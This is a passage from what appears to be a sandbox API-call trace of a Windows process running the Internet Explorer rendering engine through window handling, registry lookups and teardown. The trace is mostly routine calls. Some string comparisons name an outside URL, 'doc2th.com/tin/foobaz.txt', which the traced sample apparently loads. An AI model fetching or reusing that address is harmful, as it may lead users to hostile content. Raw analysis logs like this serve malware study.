X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0047.292] DefWindowProcW (hWnd=0x10200, Msg=0x46, wParam=0x0, lParam=0x40f1fc) returned 0x0 [0047.292] DefWindowProcW (hWnd=0x10200, Msg=0x83, wParam=0x1, lParam=0x40f1d0) returned 0x0 [0047.293] DefWindowProcW (hWnd=0x10200, Msg=0x47, wParam=0x0, lParam=0x40f1fc) returned 0x0 [0047.293] GlobalAddAtomW (lpString=0x0) returned 0x0 [0047.293] SetPropW (hWnd=0x101fc, lpString=0x0, hData=0x101fc) returned 0 [0047.293] ShowWindow (hWnd=0x10200, nCmdShow=0) returned 0 [0047.293] UpdateWindow (hWnd=0x10200) returned 1 [0047.293] GetCurrentThreadId () returned 0xa1c [0047.293] GetCurrentThreadId () returned 0xa1c [0047.293] GetCurrentThreadId () returned 0xa1c [0047.294] GetFocus () returned 0x10204 [0047.294] GetCursorPos (in: lpPoint=0x40f248 | out: lpPoint=0x40f248*(x=791, y=282)) returned 1 [0047.294] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40f248 | out: lpPoint=0x40f248) returned 1 [0047.294] GetClientRect (in: hWnd=0x10204, lpRect=0x40f238 | out: lpRect=0x40f238) returned 1 [0047.294] PostMessageW (hWnd=0x10204, Msg=0x20, wParam=0x204, lParam=0x1) returned 1 [0047.294] GetCursorPos (in: lpPoint=0x40f0d8 | out: lpPoint=0x40f0d8*(x=791, y=282)) returned 1 [0047.294] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40f0d8 | out: lpPoint=0x40f0d8) returned 1 [0047.294] GetKeyState (nVirtKey=16) returned 0 [0047.294] GetKeyState (nVirtKey=17) returned 0 [0047.294] GetKeyState (nVirtKey=18) returned 0 [0047.294] GetKeyState (nVirtKey=160) returned 0 [0047.294] GetKeyState (nVirtKey=162) returned 0 [0047.294] GetKeyState (nVirtKey=164) returned 0 [0047.294] GetCurrentThreadId () returned 0xa1c [0047.294] GetCurrentThreadId () returned 0xa1c [0047.294] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x75580000 [0047.295] GetProcAddress (hModule=0x75580000, lpProcName="VariantClear") returned 0x75583eae [0047.295] GetFocus () returned 0x10204 [0047.295] GetCursorPos (in: lpPoint=0x40f108 | out: lpPoint=0x40f108*(x=791, y=282)) returned 1 [0047.295] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40f108 | out: lpPoint=0x40f108) returned 1 [0047.295] GetKeyState (nVirtKey=16) returned 0 [0047.295] GetKeyState (nVirtKey=17) returned 0 [0047.295] GetKeyState (nVirtKey=18) returned 0 [0047.295] GetKeyState (nVirtKey=160) returned 0 [0047.295] GetKeyState (nVirtKey=162) returned 0 [0047.295] GetKeyState (nVirtKey=164) returned 0 [0047.295] GetCursorPos (in: lpPoint=0x40f0f0 | out: lpPoint=0x40f0f0*(x=791, y=282)) returned 1 [0047.295] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40f0f0 | out: lpPoint=0x40f0f0) returned 1 [0047.295] GetKeyState (nVirtKey=16) returned 0 [0047.295] GetKeyState (nVirtKey=17) returned 0 [0047.295] GetKeyState (nVirtKey=18) returned 0 [0047.295] GetKeyState (nVirtKey=160) returned 0 [0047.295] GetKeyState (nVirtKey=162) returned 0 [0047.295] GetKeyState (nVirtKey=164) returned 0 [0047.295] GetCurrentThreadId () returned 0xa1c [0047.295] GetCurrentThreadId () returned 0xa1c [0047.295] IsWinEventHookInstalled (event=0x8005) returned 0 [0047.295] StrCmpICW (pszStr1="about:blank", pszStr2="http://doc2th.com/tin/foobaz.txt") returned -7 [0047.295] StrCmpICW (pszStr1="about:blank", pszStr2="http://doc2th.com/tin/foobaz.txt") returned -7 [0047.295] GetCurrentThreadId () returned 0xa1c [0047.295] GetCurrentThreadId () returned 0xa1c [0047.295] GetCurrentThreadId () returned 0xa1c [0047.296] GetCurrentThreadId () returned 0xa1c [0047.341] LsGetRubyLsimethods () returned 0x0 [0047.341] LsGetTatenakayokoLsimethods () returned 0x0 [0047.341] LsGetHihLsimethods () returned 0x0 [0047.341] LsGetWarichuLsimethods () returned 0x0 [0047.341] LsGetReverseLsimethods () returned 0x0 [0047.341] LsCreateContext () returned 0x0 [0047.342] LsSetModWidthPairs () returned 0x0 [0047.343] LsSetBreaking () returned 0x0 [0047.343] LsSetDoc () returned 0x0 [0047.343] LsCreateLine () returned 0x0 [0047.344] EnumFontsW (hdc=0x210107a8, lpLogfont="Times New Roman", lpProc=0x632a0b47, lParam=0x40e704) returned 1 [0047.344] CreateFontIndirectW (lplf=0x40e6a0) returned 0x140a027b [0047.345] SelectObject (hdc=0x210107a8, h=0x140a027b) returned 0x18a002e [0047.345] GetTextMetricsW (in: hdc=0x210107a8, lptm=0x40e608 | out: lptm=0x40e608) returned 1 [0047.345] GetOutlineTextMetricsW (in: hdc=0x210107a8, cjCopy=0xd8, potm=0x40e508 | out: potm=0x40e508) returned 0xd8 [0047.346] SelectObject (hdc=0x210107a8, h=0x18a002e) returned 0x140a027b [0047.346] SelectObject (hdc=0x210107a8, h=0x140a027b) returned 0x18a002e [0047.346] GetTextFaceW (in: hdc=0x210107a8, c=32, lpName=0x40e758 | out: lpName="Times New Roman") returned 16 [0047.346] SelectObject (hdc=0x210107a8, h=0x18a002e) returned 0x140a027b [0047.346] SelectObject (hdc=0x210107a8, h=0x140a027b) returned 0x18a002e [0047.346] GetTextCharsetInfo (in: hdc=0x210107a8, lpSig=0x40e6c0, dwFlags=0x0 | out: lpSig=0x40e6c0) returned 0 [0047.346] SelectObject (hdc=0x210107a8, h=0x18a002e) returned 0x140a027b [0047.346] SelectObject (hdc=0x210107a8, h=0x140a027b) returned 0x18a002e [0047.346] GetFontUnicodeRanges (in: hdc=0x210107a8, lpgs=0x0 | out: lpgs=0x0) returned 0x27c [0047.346] GetFontUnicodeRanges (in: hdc=0x210107a8, lpgs=0x14b8d0 | out: lpgs=0x14b8d0) returned 0x27c [0047.346] SelectObject (hdc=0x210107a8, h=0x18a002e) returned 0x140a027b [0047.346] SelectObject (hdc=0x210107a8, h=0x140a027b) returned 0x18a002e [0047.346] GetCharWidth32W (in: hdc=0x210107a8, iFirst=0x20, iLast=0x7e, lpBuffer=0x40e698 | out: lpBuffer=0x40e698) returned 1 [0047.348] SelectObject (hdc=0x210107a8, h=0x18a002e) returned 0x140a027b [0047.348] LsQueryLineDup () returned 0x0 [0047.348] LsDestroyLine () returned 0x0 [0047.348] IntersectRect (in: lprcDst=0x40f464, lprcSrc1=0x40f464, lprcSrc2=0x40f434 | out: lprcDst=0x40f464) returned 1 [0047.348] IntersectRect (in: lprcDst=0x15b018, lprcSrc1=0x15b018, lprcSrc2=0x40f454 | out: lprcDst=0x15b018) returned 1 [0047.348] IntersectRect (in: lprcDst=0x15b018, lprcSrc1=0x15b018, lprcSrc2=0x40f474 | out: lprcDst=0x15b018) returned 1 [0047.348] IntersectRect (in: lprcDst=0x40f124, lprcSrc1=0x40f124, lprcSrc2=0x40f0f4 | out: lprcDst=0x40f124) returned 1 [0047.348] IntersectRect (in: lprcDst=0x15b018, lprcSrc1=0x15b018, lprcSrc2=0x40f114 | out: lprcDst=0x15b018) returned 1 [0047.348] IntersectRect (in: lprcDst=0x15b018, lprcSrc1=0x15b018, lprcSrc2=0x40f134 | out: lprcDst=0x15b018) returned 1 [0047.348] IntersectRect (in: lprcDst=0x40f038, lprcSrc1=0x40f038, lprcSrc2=0x15b008 | out: lprcDst=0x40f038) returned 1 [0047.348] UnionRect (in: lprcDst=0x40f340, lprcSrc1=0x40f340, lprcSrc2=0x40f2ec | out: lprcDst=0x40f340) returned 1 [0047.348] IntersectRect (in: lprcDst=0x40f2d8, lprcSrc1=0x40f2d8, lprcSrc2=0x40f270 | out: lprcDst=0x40f2d8) returned 1 [0047.348] IntersectRect (in: lprcDst=0x40f1e8, lprcSrc1=0x40f1e8, lprcSrc2=0x40f270 | out: lprcDst=0x40f1e8) returned 1 [0047.348] IntersectRect (in: lprcDst=0x40f280, lprcSrc1=0x40f280, lprcSrc2=0x40f1e8 | out: lprcDst=0x40f280) returned 1 [0047.349] IntersectRect (in: lprcDst=0x40f2d8, lprcSrc1=0x40f2d8, lprcSrc2=0x40f270 | out: lprcDst=0x40f2d8) returned 1 [0047.349] IntersectRect (in: lprcDst=0x40f2d8, lprcSrc1=0x40f2d8, lprcSrc2=0x40f270 | out: lprcDst=0x40f2d8) returned 1 [0047.349] IntersectRect (in: lprcDst=0x40f1e8, lprcSrc1=0x40f1e8, lprcSrc2=0x40f270 | out: lprcDst=0x40f1e8) returned 1 [0047.349] IntersectRect (in: lprcDst=0x40f280, lprcSrc1=0x40f280, lprcSrc2=0x40f1e8 | out: lprcDst=0x40f280) returned 1 [0047.349] IntersectRect (in: lprcDst=0x40f2d8, lprcSrc1=0x40f2d8, lprcSrc2=0x40f270 | out: lprcDst=0x40f2d8) returned 1 [0047.349] UnionRect (in: lprcDst=0x40f680, lprcSrc1=0x40f680, lprcSrc2=0x40f62c | out: lprcDst=0x40f680) returned 1 [0047.349] RedrawWindow (hWnd=0x10204, lprcUpdate=0x40f700, hrgnUpdate=0x0, flags=0x21) returned 1 [0047.349] GetCursorPos (in: lpPoint=0x40f630 | out: lpPoint=0x40f630*(x=791, y=282)) returned 1 [0047.349] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40f630 | out: lpPoint=0x40f630) returned 1 [0047.349] GetKeyState (nVirtKey=16) returned 0 [0047.349] GetKeyState (nVirtKey=17) returned 0 [0047.349] GetKeyState (nVirtKey=18) returned 0 [0047.349] GetKeyState (nVirtKey=160) returned 0 [0047.349] GetKeyState (nVirtKey=162) returned 0 [0047.349] GetKeyState (nVirtKey=164) returned 0 [0047.349] GetCurrentThreadId () returned 0xa1c [0047.349] GetCurrentThreadId () returned 0xa1c [0047.349] GetCurrentThreadId () returned 0xa1c [0047.349] GetFocus () returned 0x10204 [0047.349] GetCurrentThreadId () returned 0xa1c [0047.349] GetCursorPos (in: lpPoint=0x40f5f0 | out: lpPoint=0x40f5f0*(x=791, y=282)) returned 1 [0047.349] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40f5f0 | out: lpPoint=0x40f5f0) returned 1 [0047.349] GetKeyState (nVirtKey=16) returned 0 [0047.349] GetKeyState (nVirtKey=17) returned 0 [0047.349] GetKeyState (nVirtKey=18) returned 0 [0047.349] GetKeyState (nVirtKey=160) returned 0 [0047.349] GetKeyState (nVirtKey=162) returned 0 [0047.349] GetKeyState (nVirtKey=164) returned 0 [0047.350] GetCursorPos (in: lpPoint=0x40f5d0 | out: lpPoint=0x40f5d0*(x=791, y=282)) returned 1 [0047.350] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40f5d0 | out: lpPoint=0x40f5d0) returned 1 [0047.350] GetKeyState (nVirtKey=16) returned 0 [0047.350] GetKeyState (nVirtKey=17) returned 0 [0047.350] GetKeyState (nVirtKey=18) returned 0 [0047.350] GetKeyState (nVirtKey=160) returned 0 [0047.350] GetKeyState (nVirtKey=162) returned 0 [0047.350] GetKeyState (nVirtKey=164) returned 0 [0047.350] GetCurrentThreadId () returned 0xa1c [0047.350] GetCurrentThreadId () returned 0xa1c [0047.350] IsWinEventHookInstalled (event=0x8005) returned 0 [0047.350] GetCurrentThreadId () returned 0xa1c [0047.350] GetCurrentThreadId () returned 0xa1c [0047.350] GetCurrentThreadId () returned 0xa1c [0047.350] GetCursorPos (in: lpPoint=0x40f568 | out: lpPoint=0x40f568*(x=791, y=282)) returned 1 [0047.350] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40f568 | out: lpPoint=0x40f568) returned 1 [0047.350] GetKeyState (nVirtKey=16) returned 0 [0047.350] GetKeyState (nVirtKey=17) returned 0 [0047.350] GetKeyState (nVirtKey=18) returned 0 [0047.350] GetKeyState (nVirtKey=160) returned 0 [0047.350] GetKeyState (nVirtKey=162) returned 0 [0047.350] GetKeyState (nVirtKey=164) returned 0 [0047.350] GetCursorPos (in: lpPoint=0x40f550 | out: lpPoint=0x40f550*(x=791, y=282)) returned 1 [0047.351] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40f550 | out: lpPoint=0x40f550) returned 1 [0047.351] GetKeyState (nVirtKey=16) returned 0 [0047.351] GetKeyState (nVirtKey=17) returned 0 [0047.351] GetKeyState (nVirtKey=18) returned 0 [0047.351] GetKeyState (nVirtKey=160) returned 0 [0047.351] GetKeyState (nVirtKey=162) returned 0 [0047.351] GetKeyState (nVirtKey=164) returned 0 [0047.351] GetCurrentThreadId () returned 0xa1c [0047.351] GetCurrentThreadId () returned 0xa1c [0047.352] GetCurrentThreadId () returned 0xa1c [0047.357] GetMessageW (in: lpMsg=0x40f904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x40f904) returned 1 [0047.357] TranslateMessage (lpMsg=0x40f904) returned 0 [0047.357] DispatchMessageW (lpMsg=0x40f904) returned 0x0 [0047.357] GetCursorPos (in: lpPoint=0x40f200 | out: lpPoint=0x40f200*(x=791, y=282)) returned 1 [0047.357] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40f200 | out: lpPoint=0x40f200) returned 1 [0047.357] GetKeyState (nVirtKey=16) returned 0 [0047.357] GetKeyState (nVirtKey=17) returned 0 [0047.357] GetKeyState (nVirtKey=18) returned 0 [0047.357] GetKeyState (nVirtKey=160) returned 0 [0047.357] GetKeyState (nVirtKey=162) returned 0 [0047.357] GetKeyState (nVirtKey=164) returned 0 [0047.358] GetCursorPos (in: lpPoint=0x40f090 | out: lpPoint=0x40f090*(x=791, y=282)) returned 1 [0047.358] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40f090 | out: lpPoint=0x40f090) returned 1 [0047.358] GetKeyState (nVirtKey=16) returned 0 [0047.358] GetKeyState (nVirtKey=17) returned 0 [0047.358] GetKeyState (nVirtKey=18) returned 0 [0047.358] GetKeyState (nVirtKey=160) returned 0 [0047.358] GetKeyState (nVirtKey=162) returned 0 [0047.358] GetKeyState (nVirtKey=164) returned 0 [0047.358] GetCurrentThreadId () returned 0xa1c [0047.358] GetCurrentThreadId () returned 0xa1c [0047.358] GetCurrentThreadId () returned 0xa1c [0047.358] DestroyWindow (hWnd=0x10200) returned 1 [0047.358] DefWindowProcW (hWnd=0x10200, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0047.358] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0047.358] GetKeyState (nVirtKey=1) returned 0 [0047.358] GetKeyState (nVirtKey=2) returned 0 [0047.358] GetKeyState (nVirtKey=16) returned 0 [0047.358] GetKeyState (nVirtKey=17) returned 0 [0047.358] GetKeyState (nVirtKey=4) returned 0 [0047.358] GetKeyState (nVirtKey=18) returned 0 [0047.358] GetMessageTime () returned 108639 [0047.358] GetMessagePos () returned 0x11a0317 [0047.359] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x150ec8, hWnd=0x10204, msg=0x281, wParam=0x0, lParam=0xc000000f*=0, plResult=0x40f0cc | out: plResult=0x40f0cc) returned 0x0 [0047.359] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0047.359] GetKeyState (nVirtKey=1) returned 0 [0047.359] GetKeyState (nVirtKey=2) returned 0 [0047.359] GetKeyState (nVirtKey=16) returned 0 [0047.359] GetKeyState (nVirtKey=17) returned 0 [0047.359] GetKeyState (nVirtKey=4) returned 0 [0047.359] GetKeyState (nVirtKey=18) returned 0 [0047.359] GetMessageTime () returned 108639 [0047.359] GetMessagePos () returned 0x11a0317 [0047.360] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x150ec8, hWnd=0x10204, msg=0x282, wParam=0x1, lParam=0x0, plResult=0x40eb24 | out: plResult=0x40eb24) returned 0x0 [0047.360] SetTimer (hWnd=0x10204, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000 [0047.360] GetCurrentThreadId () returned 0xa1c [0047.360] GetCurrentThreadId () returned 0xa1c [0047.360] PostQuitMessage (nExitCode=0) [0047.360] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0047.360] RevokeDragDrop (hwnd=0x10204) returned 0x0 [0047.360] GetCurrentThreadId () returned 0xa1c [0047.360] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0047.360] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x150ec8, hWnd=0x10204, msg=0x82, wParam=0x0, lParam=0x0, plResult=0x40f634 | out: plResult=0x40f634) returned 0x1 [0047.360] DefWindowProcW (hWnd=0x10204, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0047.360] GetCurrentThreadId () returned 0xa1c [0047.360] SetWindowLongW (hWnd=0x10204, nIndex=-21, dwNewLong=0) returned 1183792 [0047.360] DefWindowProcW (hWnd=0x10200, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0047.360] GetMessageW (in: lpMsg=0x40f904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x40f904) returned 0 [0047.361] PostMessageW (hWnd=0x10202, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0047.361] GetCurrentThreadId () returned 0xa1c [0047.361] GetCursorPos (in: lpPoint=0x40f6b0 | out: lpPoint=0x40f6b0*(x=791, y=282)) returned 1 [0047.361] ScreenToClient (in: hWnd=0x0, lpPoint=0x40f6b0 | out: lpPoint=0x40f6b0) returned 0 [0047.361] GetKeyState (nVirtKey=16) returned 0 [0047.361] GetKeyState (nVirtKey=17) returned 0 [0047.361] GetKeyState (nVirtKey=18) returned 0 [0047.361] GetKeyState (nVirtKey=160) returned 0 [0047.361] GetKeyState (nVirtKey=162) returned 0 [0047.361] GetKeyState (nVirtKey=164) returned 0 [0047.361] GetCursorPos (in: lpPoint=0x40f698 | out: lpPoint=0x40f698*(x=791, y=282)) returned 1 [0047.361] ScreenToClient (in: hWnd=0x0, lpPoint=0x40f698 | out: lpPoint=0x40f698) returned 0 [0047.361] GetKeyState (nVirtKey=16) returned 0 [0047.361] GetKeyState (nVirtKey=17) returned 0 [0047.361] GetKeyState (nVirtKey=18) returned 0 [0047.361] GetKeyState (nVirtKey=160) returned 0 [0047.361] GetKeyState (nVirtKey=162) returned 0 [0047.361] GetKeyState (nVirtKey=164) returned 0 [0047.361] GetCurrentThreadId () returned 0xa1c [0047.362] GetCurrentThreadId () returned 0xa1c [0047.362] IsWinEventHookInstalled (event=0x8005) returned 0 [0047.362] GetCurrentThreadId () returned 0xa1c [0047.362] CActiveIMMAppEx_Trident:IActiveIMMApp:Deactivate (This=0x150ec8) returned 0x0 [0047.362] IntersectRect (in: lprcDst=0x40f718, lprcSrc1=0x40f718, lprcSrc2=0x40f7a0 | out: lprcDst=0x40f718) returned 1 [0047.362] IntersectRect (in: lprcDst=0x40f7b0, lprcSrc1=0x40f7b0, lprcSrc2=0x40f718 | out: lprcDst=0x40f7b0) returned 1 [0047.362] IntersectRect (in: lprcDst=0x40f808, lprcSrc1=0x40f808, lprcSrc2=0x40f7a0 | out: lprcDst=0x40f808) returned 1 [0047.362] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f824 | out: phkResult=0x40f824*=0x4e8) returned 0x0 [0047.362] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f828 | out: phkResult=0x40f828*=0x47c) returned 0x0 [0047.362] RegOpenKeyExW (in: hKey=0x47c, lpSubKey="FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP", ulOptions=0x0, samDesired=0x1, phkResult=0x40f7e4 | out: phkResult=0x40f7e4*=0x0) returned 0x2 [0047.362] RegOpenKeyExW (in: hKey=0x4e8, lpSubKey="FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP", ulOptions=0x0, samDesired=0x1, phkResult=0x40f7e4 | out: phkResult=0x40f7e4*=0x0) returned 0x2 [0047.362] RegCloseKey (hKey=0x0) returned 0x6 [0047.362] RegCloseKey (hKey=0x0) returned 0x6 [0047.362] RegCloseKey (hKey=0x4e8) returned 0x0 [0047.362] RegCloseKey (hKey=0x47c) returned 0x0 [0047.362] GetCurrentThreadId () returned 0xa1c [0047.362] GetCurrentThreadId () returned 0xa1c [0047.362] GetCurrentThreadId () returned 0xa1c [0047.362] GetCurrentThreadId () returned 0xa1c [0047.362] GetCurrentThreadId () returned 0xa1c [0047.362] IUnknown:Release (This=0x142738) returned 0x1 [0047.362] GetCurrentThreadId () returned 0xa1c [0047.362] GetCurrentThreadId () returned 0xa1c [0047.362] GetCurrentThreadId () returned 0xa1c [0047.363] CoGetObjectContext (in: riid=0x6e8d0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x40f818 | out: ppv=0x40f818*=0x116278) returned 0x0 [0047.363] IUnknown:Release (This=0x17d608) returned 0x0 [0047.366] StdGlobalInterfaceTable:IGlobalInterfaceTable:RevokeInterfaceFromGlobal (This=0x76836460, dwCookie=0x100) returned 0x0 [0047.366] IUnknown:Release (This=0x59ffb8) returned 0x1 [0047.366] IUnknown:Release (This=0x116278) returned 0x1 [0047.366] IUnknown:Release (This=0x116278) returned 0x0 [0047.366] ISystemDebugEventFire:EndSession (This=0x142738) returned 0x0 [0047.366] IUnknown:Release (This=0x142738) returned 0x0 [0047.366] GetUserDefaultLCID () returned 0x409 [0047.366] GetACP () returned 0x4e4 [0047.366] GetCurrentThreadId () returned 0xa1c [0047.367] IUnknown:Release (This=0x122f88) returned 0x0 [0047.367] IUnknown:Release (This=0x12176c) returned 0x0 [0047.367] IUnknown:Release (This=0x636896bc) returned 0x1 [0047.367] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x40f8bc | out: ppURI=0x40f8bc*=0x11ab04) returned 0x0 [0047.368] IUri:GetScheme (in: This=0x11ab04, pdwScheme=0x40f854 | out: pdwScheme=0x40f854*=0x11) returned 0x0 [0047.368] IUnknown:QueryInterface (in: This=0x11ab04, riid=0x6330d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x40f85c | out: ppvObject=0x40f85c*=0x11ab04) returned 0x0 [0047.368] IUnknown:Release (This=0x11ab04) returned 0x2 [0047.368] IUnknown:AddRef (This=0x11ab04) returned 0x3 [0047.368] IUnknown:Release (This=0x11ab04) returned 0x2 [0047.368] IUri:IsEqual (in: This=0x11ae64, pUri=0x11ab04, pfEqual=0x40f89c | out: pfEqual=0x40f89c*=0) returned 0x0 [0047.368] IUnknown:Release (This=0x11ae64) returned 0x5 [0047.368] IUnknown:AddRef (This=0x11ab04) returned 0x3 [0047.368] IUri:GetAbsoluteUri (in: This=0x11ab04, pbstrAbsoluteUri=0x120bd0 | out: pbstrAbsoluteUri=0x120bd0*="about:blank") returned 0x0 [0047.368] IUnknown:Release (This=0x11ab04) returned 0x2 [0047.368] GetCurrentProcessId () returned 0xa18 [0047.370] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x76cf0000 [0047.370] GetProcAddress (hModule=0x76cf0000, lpProcName="InternetUnlockRequestFile") returned 0x76d37457 [0047.370] InternetUnlockRequestFile (in: hLockRequestInfo=0x158db0 | out: hLockRequestInfo=0x158db0) returned 1 [0047.371] IUnknown:Release (This=0x11ae64) returned 0x4 [0047.371] IUnknown:Release (This=0x11ae64) returned 0x3 [0047.372] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x121764, dwReserved=0x0 | out: ppSM=0x121764*=0x14fb40) returned 0x0 [0047.372] IInternetSecurityManager:SetSecuritySite (This=0x14fb40, pSite=0x12176c) returned 0x0 [0047.372] IUnknown:AddRef (This=0x12176c) returned 0x31 [0047.372] IUnknown:QueryInterface (in: This=0x12176c, riid=0x764a61d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x40f534 | out: ppvObject=0x40f534*=0x121770) returned 0x0 [0047.372] IServiceProvider:QueryService (in: This=0x121770, guidService=0x764af13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x764af13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x14fb68 | out: ppvObject=0x14fb68*=0x0) returned 0x80004002 [0047.372] IServiceProvider:QueryService (in: This=0x121770, guidService=0x764af12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x764af12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x14fb64 | out: ppvObject=0x14fb64*=0x0) returned 0x80004002 [0047.372] IServiceProvider:QueryService (in: This=0x121770, guidService=0x7649c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7649c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x14fb60 | out: ppvObject=0x14fb60*=0x636896bc) returned 0x0 [0047.372] IUnknown:Release (This=0x121770) returned 0x0 [0047.372] IUnknown:AddRef (This=0x11ab04) returned 0x3 [0047.372] IInternetSecurityManager:MapUrlToZone (in: This=0x636896bc, pwszUrl="about:blank", pdwZone=0x40f56c, dwFlags=0x0 | out: pdwZone=0x40f56c*=0xffffffff) returned 0x800c0011 [0047.372] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0047.372] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0047.372] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0047.372] IInternetSecurityManager:ProcessUrlAction (in: This=0x636896bc, pwszUrl="about:blank", dwAction=0x2106, pPolicy=0x40f570, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x40f570*=0x0) returned 0x0 [0047.372] IUnknown:Release (This=0x11ab04) returned 0x2 [0047.372] IUnknown:Release (This=0xff600) returned 0x1 [0047.372] IUnknown:Release (This=0x11ab04) returned 0x1 [0047.373] LsDestroyContext () returned 0x0 [0047.374] IUnknown:Release (This=0x14fb40) returned 0x0 [0047.374] IUnknown:Release (This=0x12176c) returned 0x0 [0047.374] IUnknown:Release (This=0x636896bc) returned 0x7fff [0047.374] IUnknown:Release (This=0x121f20) returned 0x0 [0047.374] GetModuleHandleW (lpModuleName="OLEAUT32") returned 0x75580000 [0047.374] GetProcAddress (hModule=0x75580000, lpProcName=0xc9) returned 0x75584af8 [0047.374] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0047.374] IInternetSession:UnregisterNameSpace (This=0x124868, pCF=0x63688c50, pszProtocol="res") returned 0x0 [0047.374] IUnknown:Release (This=0x63688c50) returned 0x1 [0047.375] IInternetSession:UnregisterNameSpace (This=0x124868, pCF=0x63688c70, pszProtocol="about") returned 0x0 [0047.375] IUnknown:Release (This=0x63688c70) returned 0x1 [0047.375] IUnknown:Release (This=0x124868) returned 0x1 [0047.375] IUnknown:Release (This=0x1234e8) returned 0x0 [0047.375] DeleteDC (hdc=0x210107a8) returned 1 [0047.375] DestroyWindow (hWnd=0x10202) returned 1 [0047.375] DefWindowProcW (hWnd=0x10202, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0047.376] DefWindowProcW (hWnd=0x10202, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0047.376] DefWindowProcW (hWnd=0x10202, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0047.377] GetExitCodeThread (in: hThread=0x3b8, lpExitCode=0x40f894 | out: lpExitCode=0x40f894) returned 1 [0047.377] CloseHandle (hObject=0x1bc) returned 1 [0047.377] CloseHandle (hObject=0x3b8) returned 1 [0047.377] CActiveIMMAppEx_Trident:IUnknown:Release (This=0x150ec8) returned 0x0 [0047.377] ReleaseActCtx (in: hActCtx=0x11fa2c | out: hActCtx=0x11fa2c) [0047.377] FreeLibrary (hLibModule=0x6d270000) returned 1 [0047.377] FreeLibrary (hLibModule=0x6d270000) returned 1 [0047.377] UnregisterClassW (lpClassName=0xc19d, hInstance=0x63150000) returned 1 [0047.377] UnregisterClassW (lpClassName=0xc19b, hInstance=0x63150000) returned 1 [0047.377] OleUninitialize () [0047.378] 